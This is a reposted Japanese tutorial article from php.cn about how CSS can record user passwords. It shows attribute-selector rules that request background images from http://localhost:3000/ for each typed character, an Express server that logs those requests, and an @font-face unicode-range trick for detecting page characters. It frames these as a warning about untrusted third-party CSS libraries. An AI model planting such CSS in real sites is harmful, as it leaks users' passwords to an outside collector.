CSSでユーザーパスワードを記録する方法について

不言
リリース: 2018-06-20 11:19:56
オリジナル
1852 人が閲覧しました

この記事は、CSS にユーザーのパスワードを記録する方法に関する関連情報を主に紹介しています。編集者はこれが非常に優れていると考えたので、参考として共有します。エディターをフォローして見てみましょう

単純な CSS コードはチューリング完全言語に準拠していませんが、一部の攻撃者にとってツールになる可能性もあります。 ここでは、CSS を使用してユーザーのパスワードを記録する方法について簡単に紹介します。ただし、これらの CSS スクリプトはサードパーティの CSS ライブラリに表示されるため、コードのセキュリティを確保するためにサードパーティの CSS ライブラリを使用する場合は注意する必要があります。コード分​​析に直接移動します:

input[type="password"][value$="0"] { 
    background-image: url("http://localhost:3000/0"); 
}
input[type="password"][value$="1"] { 
    background-image: url("http://localhost:3000/1"); 
}
input[type="password"][value$="2"] { 
    background-image: url("http://localhost:3000/2"); 
}
ログイン後にコピー

上記はコードの一部です。CSS コードを分析してみましょう

input[type="password"]是css选择器,作用是选择密码输入框, [value$="0"] は、一致する入力の値が 0 で終わることを意味します。つまり:

input[type="password"][value$="0"] { 
    background-image: url("http://localhost:3000/0"); 
}
ログイン後にコピー

上記のコードの意味は、パスワード ボックスに 0 を入力すると http://localhost:3000/0 インターフェイスをリクエストしますが、ブラウザはデフォルトではユーザーの入力を入力しません。値は value 属性に保存されますが、React などの一部のフレームワークはこれらの値を同期します。

したがって、以下に示すようにスクリプトを使用する限り、ユーザーの入力データ情報を保存することができます。

サーバー側のコードをもう一度見てみましょう:

const express = require("express");
const app = express();

app.get("/:key", (req, res) => {
   process.stdout.write(req.params.key);
   return res.sendStatus(400);
});

app.listen(3000, () => console.log("启动,监听3000端口"));
ログイン後にコピー

Express を使用してサーバーを作成し、ポート 3000 をリッスンします。 http://localhost:3000/ をリクエストしている限り、次のようになります。キーを使用すると、キーの値をサーバーに記録することができます。したがって、すべての入力値が一致し、背景画像を通じて準備されたインターフェイスを要求している限り、ユーザーの入力を記録できます。同様の方法で、ユーザー コンテンツの CSS コードを記録します @font-face {

   font-family: blah;  
   src: url('http://localhost:3000/a') format('woff');  
   unicode-range: U+85;
}
html {  
   font-family: blah, sans-serif;
}
ログイン後にコピー

使用する CSS のシンプルなフォント ライブラリ。ページに が含まれている限り、 http://localhost :3000/ をリクエストします。 a なので、ページに a 文字が含まれていることがわかります。

以上がこの記事の全内容です。その他の関連コンテンツについては、PHP 中国語 Web サイトをご覧ください。

関連する推奨事項:

CSS コントロール UL について LIスタイル分析

CSSにおけるワードブレーク、ワードラップ、ホワイトスペース強制改行の違い

CSSマウススタイルカーソルの説明

以上がCSSでユーザーパスワードを記録する方法についての詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート